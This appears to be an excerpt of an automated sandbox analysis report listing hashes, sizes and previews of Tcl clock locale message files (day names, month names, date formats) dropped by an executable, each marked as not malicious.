                                                                                                                                                                                                                                                                                                                                SHA-256:D05948D75C06669ADDB9708BC5FB48E6B651D4E62EF1B327EF8A3F605FD5271C
                                                                                                                                                                                                                                                                                                                                SHA-512:0321A5C17B3E33FDE9480AC6014B373D1663219D0069388920D277AA61341B8293883517C900030177FF82D65340E6C9E3ED051B27708DD093055E3BE64B2AF3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ms_MY DATE_FORMAT "%A %d %b %Y". ::msgcat::mcset ms_MY TIME_FORMAT_12 "%I:%M:%S %z". ::msgcat::mcset ms_MY DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):690
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.48913642143724
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:4EnLzu8+YmWjjRgWfjxBTo4erxy1IGZzNN+3v6amK3vZsq:4azu8+YZjjRXbfNedy1IG5N6vjmsvGq
                                                                                                                                                                                                                                                                                                                                MD5:CE7E67A03ED8C3297C6A5B634B55D144
                                                                                                                                                                                                                                                                                                                                SHA1:3DA5ACC0F52518541810E7F2FE57751955E12BDA
                                                                                                                                                                                                                                                                                                                                SHA-256:D115718818E3E3367847CE35BB5FF0361D08993D9749D438C918F8EB87AD8814
                                                                                                                                                                                                                                                                                                                                SHA-512:3754AA7B7D27A813C6113D2AA834A951FED1B81E4DACE22C81E0583F29BBC73C014697F39A2067DEC622D98EACD70D26FD40F80CF6D09E1C949F01FADED52C74
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset mt DAYS_OF_WEEK_ABBREV [list \. "\u0126ad"\. "Tne"\. "Tli"\. "Erb"\. "\u0126am"\. "\u0120im"]. ::msgcat::mcset mt MONTHS_ABBREV [list \. "Jan"\. "Fra"\. "Mar"\. "Apr"\. "Mej"\. "\u0120un"\. "Lul"\. "Awi"\. "Set"\. "Ott"\. "Nov"]. ::msgcat::mcset mt BCE "QK". ::msgcat::mcset mt CE "". ::msgcat::mcset mt DATE_FORMAT "%A, %e ta %B, %Y". ::msgcat::mcset mt TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset mt DATE_TIME_FORMAT "%A, %e ta %B, %Y %l:%M:%S %P %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1157
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.24006506188001
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8CKEj4/xasSpfiTBtHQT1V/W3WNfvZv3l:46KU/0s2iTeVOiHN1
                                                                                                                                                                                                                                                                                                                                MD5:D5509ABF5CBFB485C20A26FCC6B1783E
                                                                                                                                                                                                                                                                                                                                SHA1:53A298FBBF09AE2E223B041786443A3D8688C9EB
                                                                                                                                                                                                                                                                                                                                SHA-256:BC401889DD934C49D10D99B471441BE2B536B1722739C7B0AB7DE7629680F602
                                                                                                                                                                                                                                                                                                                                SHA-512:BDAFBA46EF44151CFD9EF7BC1909210F6DB2BAC20C31ED21AE3BE7EAC785CD4F545C4590CF551C0D066F982E2050F5844BDDC569F32C5804DBDE657F4511A6FE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset nb DAYS_OF_WEEK_ABBREV [list \. "s\u00f8"\. "ma"\. "ti"\. "on"\. "to"\. "fr"\. "l\u00f8"]. ::msgcat::mcset nb DAYS_OF_WEEK_FULL [list \. "s\u00f8ndag"\. "mandag"\. "tirsdag"\. "onsdag"\. "torsdag"\. "fredag"\. "l\u00f8rdag"]. ::msgcat::mcset nb MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "mai"\. "jun"\. "jul"\. "aug"\. "sep"\. "okt"\. "nov"\. "des"\. ""]. ::msgcat::mcset nb MONTHS_FULL [list \. "januar"\. "februar"\. "mars"\. "april"\. "mai"\. "juni"\. "juli"\. "august"\. "september"\. "oktober"\. "november"\. "desember"\. ""]. ::msgcat::mcset nb BCE "f.Kr.". ::msgcat::mcset nb CE "e.Kr.".
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1079
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.158523842311663
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu84LFiS8LMKZoNfSZTNTQhFCNZvtWvg:46Oi5LMKZASZTEF2Ntgg
                                                                                                                                                                                                                                                                                                                                MD5:98820DFF7E1C8A9EAB8C74B0B25DEB5D
                                                                                                                                                                                                                                                                                                                                SHA1:5357063D5699188E544D244EC4AEFDDF7606B922
                                                                                                                                                                                                                                                                                                                                SHA-256:49128B36B88E380188059C4B593C317382F32E29D1ADC18D58D14D142459A2BB
                                                                                                                                                                                                                                                                                                                                SHA-512:26AB945B7BA00433BEC85ACC1D90D1D3B70CE505976CABE1D75A7134E00CD591AC27463987C515EEA079969DBCF200DA9C8538CAAF178A1EE17C9B0284260C45
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset nl DAYS_OF_WEEK_ABBREV [list \. "zo"\. "ma"\. "di"\. "wo"\. "do"\. "vr"\. "za"]. ::msgcat::mcset nl DAYS_OF_WEEK_FULL [list \. "zondag"\. "maandag"\. "dinsdag"\. "woensdag"\. "donderdag"\. "vrijdag"\. "zaterdag"]. ::msgcat::mcset nl MONTHS_ABBREV [list \. "jan"\. "feb"\. "mrt"\. "apr"\. "mei"\. "jun"\. "jul"\. "aug"\. "sep"\. "okt"\. "nov"\. "dec"\. ""]. ::msgcat::mcset nl MONTHS_FULL [list \. "januari"\. "februari"\. "maart"\. "april"\. "mei"\. "juni"\. "juli"\. "augustus"\. "september"\. "oktober"\. "november"\. "december"\. ""]. ::msgcat::mcset nl DATE_FORMAT "%e %B %Y". ::msgcat::mcset nl TIME_FORM
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):279
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.817188474504631
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmo4gPI5og9X3vG5og9X3v6X5o49+3vnFDoAov:4EnLzu8WgAhF3v8F3v6JI3v9dy
                                                                                                                                                                                                                                                                                                                                MD5:B08E30850CA849068D06A99B4E216892
                                                                                                                                                                                                                                                                                                                                SHA1:11B5E95FF4D822E76A1B9C28EEC2BC5E95E5E362
                                                                                                                                                                                                                                                                                                                                SHA-256:9CD54EC24CBDBEC5E4FE543DDA8CA95390678D432D33201FA1C32B61F8FE225A
                                                                                                                                                                                                                                                                                                                                SHA-512:9AF147C2F22B11115E32E0BFD0126FE7668328E7C67B349A781F42B0022A334E53DDF3FCCC2C34C91BFBB45602A002D0D7B569B5E1FE9F0EE6C4570400CB0B0C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset nl_BE DATE_FORMAT "%d-%m-%y". ::msgcat::mcset nl_BE TIME_FORMAT "%T". ::msgcat::mcset nl_BE TIME_FORMAT_12 "%T". ::msgcat::mcset nl_BE DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1148
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.207752506572597
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8eNsP2/xhsSpf2TBtHQT15j63WN7v9v3l:46it/vs22Te5OiL51
                                                                                                                                                                                                                                                                                                                                MD5:2266607EF358B632696C7164E61358B5
                                                                                                                                                                                                                                                                                                                                SHA1:A380863A8320DAB1D5A2D60C22ED5F7DB5C7BAF7
                                                                                                                                                                                                                                                                                                                                SHA-256:5EE93A8C245722DEB64B68EFF50C081F24DA5DE43D999C006A10C484E1D3B4ED
                                                                                                                                                                                                                                                                                                                                SHA-512:2A8DEF754A25736D14B958D8B0CEA0DC41C402A9EFA25C9500BA861A7E8D74C79939C1969AC694245605C17D33AD3984F6B9ACCA4BE03EFC41A878772BB5FD86
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset nn DAYS_OF_WEEK_ABBREV [list \. "su"\. "m\u00e5"\. "ty"\. "on"\. "to"\. "fr"\. "lau"]. ::msgcat::mcset nn DAYS_OF_WEEK_FULL [list \. "sundag"\. "m\u00e5ndag"\. "tysdag"\. "onsdag"\. "torsdag"\. "fredag"\. "laurdag"]. ::msgcat::mcset nn MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "mai"\. "jun"\. "jul"\. "aug"\. "sep"\. "okt"\. "nov"\. "des"\. ""]. ::msgcat::mcset nn MONTHS_FULL [list \. "januar"\. "februar"\. "mars"\. "april"\. "mai"\. "juni"\. "juli"\. "august"\. "september"\. "oktober"\. "november"\. "desember"\. ""]. ::msgcat::mcset nn BCE "f.Kr.". ::msgcat::mcset nn CE "e.Kr.". ::msgca
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1211
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.392723231340452
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:4EnLzu854moKR4mtPoTckd8EnO6z3K4jwxI1LRhtm3ni8FwxIBgdE4RsMZmB0CLs:4azu8yNgyJxPEyRhonO+AjTg0Okvpvn
                                                                                                                                                                                                                                                                                                                                MD5:31A9133E9DCA7751B4C3451D60CCFFA0
                                                                                                                                                                                                                                                                                                                                SHA1:FB97A5830965716E77563BE6B7EB1C6A0EA6BF40
                                                                                                                                                                                                                                                                                                                                SHA-256:C39595DDC0095EB4AE9E66DB02EE175B31AC3DA1F649EB88FA61B911F838F753
                                                                                                                                                                                                                                                                                                                                SHA-512:329EE7FE79783C83361A0C5FFFD7766B64B8544D1AD63C57AEAA2CC6A526E01D9C4D7765C73E88F86DAE57477459EA330A0C42F39E441B50DE9B0F429D01EAE8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset pl DAYS_OF_WEEK_ABBREV [list \. "N"\. "Pn"\. "Wt"\. "\u015ar"\. "Cz"\. "Pt"\. "So"]. ::msgcat::mcset pl DAYS_OF_WEEK_FULL [list \. "niedziela"\. "poniedzia\u0142ek"\. "wtorek"\. "\u015broda"\. "czwartek"\. "pi\u0105tek"\. "sobota"]. ::msgcat::mcset pl MONTHS_ABBREV [list \. "sty"\. "lut"\. "mar"\. "kwi"\. "maj"\. "cze"\. "lip"\. "sie"\. "wrz"\. "pa\u017a"\. "lis"\. "gru"\. ""]. ::msgcat::mcset pl MONTHS_FULL [list \. "stycze\u0144"\. "luty"\. "marzec"\. "kwiecie\u0144"\. "maj"\. "czerwiec"\. "lipiec"\. "sierpie\u0144"\. "wrzesie\u0144"\. "pa\u017adziernik"\. "listopad"\. "grudzie\u0144"\. ""]. ::msgcat::m
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1127
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.325163993882846
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8pYpzzktTYyUgC0CIKjblie5f9kwAAs+CFsFoD6GADvtU6svO:46dCzWTh2AA9/2F4oD6GAztU6KO
                                                                                                                                                                                                                                                                                                                                MD5:D827F76D1ED6CB89839CAC2B56FD7252
                                                                                                                                                                                                                                                                                                                                SHA1:140D6BC1F6CEF5FD0A390B3842053BF54B54B4E2
                                                                                                                                                                                                                                                                                                                                SHA-256:9F2BFFA3B4D8783B2CFB2CED9CC4319ACF06988F61829A1E5291D55B19854E88
                                                                                                                                                                                                                                                                                                                                SHA-512:B662336699E23E371F0148EDD742F71874A7A28DFA81F0AFAE91C8C9494CEA1904FEA0C21264CF2A253E0FB1360AD35B28CFC4B74E4D7B2DBB0E453E96F7EB93
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset pt DAYS_OF_WEEK_ABBREV [list \. "Dom"\. "Seg"\. "Ter"\. "Qua"\. "Qui"\. "Sex"\. "S\u00e1b"]. ::msgcat::mcset pt DAYS_OF_WEEK_FULL [list \. "Domingo"\. "Segunda-feira"\. "Ter\u00e7a-feira"\. "Quarta-feira"\. "Quinta-feira"\. "Sexta-feira"\. "S\u00e1bado"]. ::msgcat::mcset pt MONTHS_ABBREV [list \. "Jan"\. "Fev"\. "Mar"\. "Abr"\. "Mai"\. "Jun"\. "Jul"\. "Ago"\. "Set"\. "Out"\. "Nov"\. "Dez"\. ""]. ::msgcat::mcset pt MONTHS_FULL [list \. "Janeiro"\. "Fevereiro"\. "Mar\u00e7o"\. "Abril"\. "Maio"\. "Junho"\. "Julho"\. "Agosto"\. "Setembro"\. "Outubro"\. "Novembro"\. "Dezembro"\. ""]. ::msgcat::mcset pt DATE_FO
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):279
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8127929329126085
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmofm6GPWHFLofAW3vG5ofAW3v6X5ofm6T+3vnFDoAov:4EnLzu8hNGgF493vr93v6uNK3v9dy
                                                                                                                                                                                                                                                                                                                                MD5:4EE34960147173A12020A583340E92F8
                                                                                                                                                                                                                                                                                                                                SHA1:78D91A80E2426A84BC88EE97DA28EC0E4BE8DE45
                                                                                                                                                                                                                                                                                                                                SHA-256:E383B20484EE90C00054D52DD5AF473B2AC9DC50C14D459A579EF5F44271D256
                                                                                                                                                                                                                                                                                                                                SHA-512:EDFF8FB9A86731FFF005AFBBBB522F69B2C6033F59ECCD5E35A8B6A9E0F9AF23C52FFDCC22D893915AD1854E8104C81DA8C5BD8C794C7E645AFB82001B4BFC24
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset pt_BR DATE_FORMAT "%d-%m-%Y". ::msgcat::mcset pt_BR TIME_FORMAT "%T". ::msgcat::mcset pt_BR TIME_FORMAT_12 "%T". ::msgcat::mcset pt_BR DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1172
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.279005910896047
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8/0oFUBZNk1Mkp3pFukZEoVYfPcF+T1vWFMvUvWI3:46kNkKkpLEoSfPcFgvWFqSWI3
                                                                                                                                                                                                                                                                                                                                MD5:0F5C8A7022DB1203442241ABEB5901FF
                                                                                                                                                                                                                                                                                                                                SHA1:C54C8BF05E8E6C2C0901D3C88C89DDCF35A26924
                                                                                                                                                                                                                                                                                                                                SHA-256:D2E14BE188350D343927D5380EB5672039FE9A37E9A9957921B40E4619B36027
                                                                                                                                                                                                                                                                                                                                SHA-512:13ACF499FA803D4446D8EC67119BC8257B1F093084B83D854643CEA918049F96C8FA08DC5F896EECA80A5FD552D90E5079937B1A3894D89A589E468172856163
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ro DAYS_OF_WEEK_ABBREV [list \. "D"\. "L"\. "Ma"\. "Mi"\. "J"\. "V"\. "S"]. ::msgcat::mcset ro DAYS_OF_WEEK_FULL [list \. "duminic\u0103"\. "luni"\. "mar\u0163i"\. "miercuri"\. "joi"\. "vineri"\. "s\u00eemb\u0103t\u0103"]. ::msgcat::mcset ro MONTHS_ABBREV [list \. "Ian"\. "Feb"\. "Mar"\. "Apr"\. "Mai"\. "Iun"\. "Iul"\. "Aug"\. "Sep"\. "Oct"\. "Nov"\. "Dec"\. ""]. ::msgcat::mcset ro MONTHS_FULL [list \. "ianuarie"\. "februarie"\. "martie"\. "aprilie"\. "mai"\. "iunie"\. "iulie"\. "august"\. "septembrie"\. "octombrie"\. "noiembrie"\. "decembrie"\. ""]. ::msgcat::mcset ro BCE "d.C.". ::msgcat::mcset ro CE
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2039
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.225775794669275
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:46CpQ7kvicQfAQPlQoBBCZAitBmZ/QhQoQaQPTeQgQonQ4FQEWFkt3Wd:hCpgkvzRo6QBw53weFHXFgIGd
                                                                                                                                                                                                                                                                                                                                MD5:3A7181CE08259FF19D2C27CF8C6752B3
                                                                                                                                                                                                                                                                                                                                SHA1:97DFFB1E224CEDB5427841C3B59F85376CD4423B
                                                                                                                                                                                                                                                                                                                                SHA-256:C2A3A0BE5BC5A46A6A63C4DE34E317B402BAD40C22FB2936E1A4F53C1E2F625F
                                                                                                                                                                                                                                                                                                                                SHA-512:CC9620BA4601E53B22CCFC66A0B53C26224158379DF6BA2D4704A2FE11222DFBDAE3CA9CF51576B4084B8CCA8DB13FDE81396E38F94BCD0C8EA21C5D77680394
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ru DAYS_OF_WEEK_ABBREV [list \. "\u0412\u0441"\. "\u041f\u043d"\. "\u0412\u0442"\. "\u0421\u0440"\. "\u0427\u0442"\. "\u041f\u0442"\. "\u0421\u0431"]. ::msgcat::mcset ru DAYS_OF_WEEK_FULL [list \. "\u0432\u043e\u0441\u043a\u0440\u0435\u0441\u0435\u043d\u044c\u0435"\. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0438\u043a"\. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\. "\u0441\u0440\u0435\u0434\u0430"\. "\u0447\u0435\u0442\u0432\u0435\u0440\u0433"\. "\u043f\u044f\u0442\u043d\u0438\u0446\u0430"\. "\u0441\u0443\u0431\u0431\u043e\u0442\u0430"]. ::msgcat::mcset ru MONTHS_ABBREV [list \. "\u044f\u043d\u0432"\. "\u0444\u0435\u0432"\. "\u043c\u0430\u0440"\. "\u0430\u043f\u0440"\. "\u043c\u0430\u0439"\. "\u0438\u044e\u043d"\. "\u0438\u
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):242
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8961185447535
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmoVAgWFLoVY9X3vtfNrFLoVA9+3vW6Q9:4EnLzu8DFWFgaX3vtNS/3vWH9
                                                                                                                                                                                                                                                                                                                                MD5:E719F47462123A8E7DABADD2D362B4D8
                                                                                                                                                                                                                                                                                                                                SHA1:332E4CC96E7A01DA7FB399EA14770A5C5185B9F2
                                                                                                                                                                                                                                                                                                                                SHA-256:AE5D3DF23F019455F3EDFC3262AAC2B00098881F09B9A934C0D26C0AB896700C
                                                                                                                                                                                                                                                                                                                                SHA-512:93C19D51B633A118AB0D172C5A0991E5084BD54B2E61469D800F80B251A57BD1392BA66FD627586E75B1B075A7C9C2C667654F5783C423819FBDEA640A210BFA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ru_UA DATE_FORMAT "%d.%m.%Y". ::msgcat::mcset ru_UA TIME_FORMAT "%k:%M:%S". ::msgcat::mcset ru_UA DATE_TIME_FORMAT "%d.%m.%Y %k:%M:%S %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1160
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.287536872407747
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8YYy/FY+Cnwj4EbJK5O9g+tQhgQmy/L6GWGvtlMsvWT9:46al4ETw/rWQtVWh
                                                                                                                                                                                                                                                                                                                                MD5:C7BBD44BD3C30C6116A15C77B15F8E79
                                                                                                                                                                                                                                                                                                                                SHA1:37CD1477A3318838E8D5C93D596A23F99C8409F2
                                                                                                                                                                                                                                                                                                                                SHA-256:00F119701C9F3EBA273701A6A731ADAFD7B8902F6BCCF34E61308984456E193A
                                                                                                                                                                                                                                                                                                                                SHA-512:DAFBDA53CF6AD57A4F6A078E9EF8ED3CACF2F8809DC2AEFB812A4C3ACCD51D954C52079FA26828D670BF696E14989D3FE3C249F1E612B7C759770378919D8BBC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sh DAYS_OF_WEEK_ABBREV [list \. "Ned"\. "Pon"\. "Uto"\. "Sre"\. "\u010cet"\. "Pet"\. "Sub"]. ::msgcat::mcset sh DAYS_OF_WEEK_FULL [list \. "Nedelja"\. "Ponedeljak"\. "Utorak"\. "Sreda"\. "\u010cetvrtak"\. "Petak"\. "Subota"]. ::msgcat::mcset sh MONTHS_ABBREV [list \. "Jan"\. "Feb"\. "Mar"\. "Apr"\. "Maj"\. "Jun"\. "Jul"\. "Avg"\. "Sep"\. "Okt"\. "Nov"\. "Dec"\. ""]. ::msgcat::mcset sh MONTHS_FULL [list \. "Januar"\. "Februar"\. "Mart"\. "April"\. "Maj"\. "Juni"\. "Juli"\. "Avgust"\. "Septembar"\. "Oktobar"\. "Novembar"\. "Decembar"\. ""]. ::msgcat::mcset sh BCE "p. n. e.". ::msgcat::mcset sh CE "n. e."
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1203
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.335103779497533
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu834j4PV3sSAT3fk3TEJbAT3T1cPyF3eYuCvte/v3eG:46TUG3sPk3TEkcPyFpuEtenJ
                                                                                                                                                                                                                                                                                                                                MD5:B2EF88014D274C8001B36739F5F566CE
                                                                                                                                                                                                                                                                                                                                SHA1:1044145C1714FD44D008B13A31BC778DFBE47950
                                                                                                                                                                                                                                                                                                                                SHA-256:043DECE6EA7C83956B3300B95F8A0E92BADAA8FC29D6C510706649D1D810679A
                                                                                                                                                                                                                                                                                                                                SHA-512:820EB42D94BEE21FDB990FC27F7900CF676AFC59520F3EE78FB72D6D7243A17A234D4AE964E5D52AD7CBC7DD9A593F672BAD8A80EC48B25B344AA6950EF52ECF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sk DAYS_OF_WEEK_ABBREV [list \. "Ne"\. "Po"\. "Ut"\. "St"\. "\u0160t"\. "Pa"\. "So"]. ::msgcat::mcset sk DAYS_OF_WEEK_FULL [list \. "Nede\u013ee"\. "Pondelok"\. "Utorok"\. "Streda"\. "\u0160tvrtok"\. "Piatok"\. "Sobota"]. ::msgcat::mcset sk MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "m\u00e1j"\. "j\u00fan"\. "j\u00fal"\. "aug"\. "sep"\. "okt"\. "nov"\. "dec"\. ""]. ::msgcat::mcset sk MONTHS_FULL [list \. "janu\u00e1r"\. "febru\u00e1r"\. "marec"\. "apr\u00edl"\. "m\u00e1j"\. "j\u00fan"\. "j\u00fal"\. "august"\. "september"\. "okt\u00f3ber"\. "november"\. "december"\. ""]. ::msgcat::mcset sk BCE
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1164
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.26110325084843
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8PyUpd4+RfscasS9CErTByism1KSCvt1vJo6:462U/ENsqrTtVEtRx
                                                                                                                                                                                                                                                                                                                                MD5:2566BDE28B17C526227634F1B4FC7047
                                                                                                                                                                                                                                                                                                                                SHA1:BE6940EC9F4C5E228F043F9D46A42234A02F4A03
                                                                                                                                                                                                                                                                                                                                SHA-256:BD488C9D791ABEDF698B66B768E2BF24251FFEAF06F53FB3746CAB457710FF77
                                                                                                                                                                                                                                                                                                                                SHA-512:CC684BFC82CA55240C5B542F3F63E0FF43AEF958469B3978E414261BC4FADB50A0AE3554CF2468AC88E4DDB70D2258296C0A2FBB69312223EED56C7C03FEC17C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sl DAYS_OF_WEEK_ABBREV [list \. "Ned"\. "Pon"\. "Tor"\. "Sre"\. "\u010cet"\. "Pet"\. "Sob"]. ::msgcat::mcset sl DAYS_OF_WEEK_FULL [list \. "Nedelja"\. "Ponedeljek"\. "Torek"\. "Sreda"\. "\u010cetrtek"\. "Petek"\. "Sobota"]. ::msgcat::mcset sl MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "maj"\. "jun"\. "jul"\. "avg"\. "sep"\. "okt"\. "nov"\. "dec"\. ""]. ::msgcat::mcset sl MONTHS_FULL [list \. "januar"\. "februar"\. "marec"\. "april"\. "maj"\. "junij"\. "julij"\. "avgust"\. "september"\. "oktober"\. "november"\. "december"\. ""]. ::msgcat::mcset sl BCE "pr.n.\u0161.". ::msgcat::mcset sl CE "p
